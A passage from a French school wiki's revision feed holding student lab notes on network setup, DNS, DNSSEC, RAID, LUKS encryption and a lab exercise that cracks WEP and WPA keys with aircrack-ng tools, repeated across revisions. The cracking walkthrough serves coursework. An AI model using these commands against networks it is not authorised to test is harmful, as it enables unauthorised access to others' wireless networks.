On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
On ajoute à notre fichier named.conf.options les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
 dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version&lt;br /&gt;
 dnssec-validation yes; //FOrcer le dnssec&lt;br /&gt;
&lt;br /&gt;
On génère ensuite nos clés, dans un fichier connus&lt;br /&gt;
&lt;br /&gt;
 cd /etc/bind/master&lt;br /&gt;
 dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site &lt;br /&gt;
 //Kanosteke59.site.+007+15849&lt;br /&gt;
 dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site&lt;br /&gt;
 //Kanosteke59.site.+007+60636&lt;br /&gt;
&lt;br /&gt;
ici on crée une clé pour du SHA-1&lt;br /&gt;
ON peut ensuite renommer les fichiers &lt;br /&gt;
 &lt;br /&gt;
 mv Kanosteke59.site.+007+60636.key  Kanosteke59.site.ksk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+60636.private  Kanosteke59.site.ksk.private&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.key  Kanosteke59.site.zsk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.private  Kanosteke59.site.zsk.private&lt;br /&gt;
&lt;br /&gt;
On ajoute dans la fin de définition du domaine :&lt;br /&gt;
&lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 &lt;br /&gt;
 ...&lt;br /&gt;
 &lt;br /&gt;
 $INCLUDE Kanosteke59.site.zsk.key&lt;br /&gt;
 $INCLUDE Kanosteke59.site.ksk.key&lt;br /&gt;
&lt;br /&gt;
On signe maintenant nos fichier de définition&lt;br /&gt;
 dnssec-signzone -o anosteke59.site  -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk&lt;br /&gt;
&lt;br /&gt;
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé&lt;br /&gt;
 zone &amp;quot;anosteke59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/master/anosteke59.site.signed&amp;quot;;&lt;br /&gt;
         notify yes;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Pour démarrer, nous formatons la clé :&lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :&lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte &lt;br /&gt;
 cryptsetup luksOpen /dev/sdb crypte&lt;br /&gt;
Puis nous le formatons&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypte &lt;br /&gt;
&lt;br /&gt;
Nous montons ensuite la partition afin d'y ajouter un fichier test :&lt;br /&gt;
 mkdir /mnt/cryptUSB&lt;br /&gt;
 mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/&lt;br /&gt;
&lt;br /&gt;
Nous créons ce fichier test.txt en y inscrivant &amp;quot;BONJOUR MONDE !&amp;quot; :&lt;br /&gt;
 nano /mnt/cryptUSB/test.txt&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons et fermons le volume chiffré :&lt;br /&gt;
 umount /mnt/cryptUSB&lt;br /&gt;
 cryptsetup luksClose crypte&lt;br /&gt;
&lt;br /&gt;
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== WEP ===&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44&lt;br /&gt;
&lt;br /&gt;
=== WPA ===&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
== Intrusion sur un serveur d’application Web ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57770</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57770"/>
				<updated>2022-01-10T17:27:26Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* WEP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @       IN      SOA     (&lt;br /&gt;
                        ns.anosteke.site.&lt;br /&gt;
                        ns6.gandi.net.&lt;br /&gt;
                        2;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        )&lt;br /&gt;
&lt;br /&gt;
         IN      NS      ns6.gandi.net. &lt;br /&gt;
 www     IN      A       193.48.57.182&lt;br /&gt;
 ns      IN      CNAME   www&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
On ajoute à notre fichier named.conf.options les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
 dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version&lt;br /&gt;
 dnssec-validation yes; //FOrcer le dnssec&lt;br /&gt;
&lt;br /&gt;
On génère ensuite nos clés, dans un fichier connus&lt;br /&gt;
&lt;br /&gt;
 cd /etc/bind/master&lt;br /&gt;
 dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site &lt;br /&gt;
 //Kanosteke59.site.+007+15849&lt;br /&gt;
 dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site&lt;br /&gt;
 //Kanosteke59.site.+007+60636&lt;br /&gt;
&lt;br /&gt;
ici on crée une clé pour du SHA-1&lt;br /&gt;
ON peut ensuite renommer les fichiers &lt;br /&gt;
 &lt;br /&gt;
 mv Kanosteke59.site.+007+60636.key  Kanosteke59.site.ksk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+60636.private  Kanosteke59.site.ksk.private&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.key  Kanosteke59.site.zsk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.private  Kanosteke59.site.zsk.private&lt;br /&gt;
&lt;br /&gt;
On ajoute dans la fin de définition du domaine :&lt;br /&gt;
&lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 &lt;br /&gt;
 ...&lt;br /&gt;
 &lt;br /&gt;
 $INCLUDE Kanosteke59.site.zsk.key&lt;br /&gt;
 $INCLUDE Kanosteke59.site.ksk.key&lt;br /&gt;
&lt;br /&gt;
On signe maintenant nos fichier de définition&lt;br /&gt;
 dnssec-signzone -o anosteke59.site  -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk&lt;br /&gt;
&lt;br /&gt;
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé&lt;br /&gt;
 zone &amp;quot;anosteke59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/master/anosteke59.site.signed&amp;quot;;&lt;br /&gt;
         notify yes;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Pour démarrer, nous formatons la clé :&lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :&lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte &lt;br /&gt;
 cryptsetup luksOpen /dev/sdb crypte&lt;br /&gt;
Puis nous le formatons&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypte &lt;br /&gt;
&lt;br /&gt;
Nous montons ensuite la partition afin d'y ajouter un fichier test :&lt;br /&gt;
 mkdir /mnt/cryptUSB&lt;br /&gt;
 mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/&lt;br /&gt;
&lt;br /&gt;
Nous créons ce fichier test.txt en y inscrivant &amp;quot;BONJOUR MONDE !&amp;quot; :&lt;br /&gt;
 nano /mnt/cryptUSB/test.txt&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons et fermons le volume chiffré :&lt;br /&gt;
 umount /mnt/cryptUSB&lt;br /&gt;
 cryptsetup luksClose crypte&lt;br /&gt;
&lt;br /&gt;
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== WEP ===&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
== Intrusion sur un serveur d’application Web ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57769</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57769"/>
				<updated>2022-01-10T17:27:16Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Tests d’intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
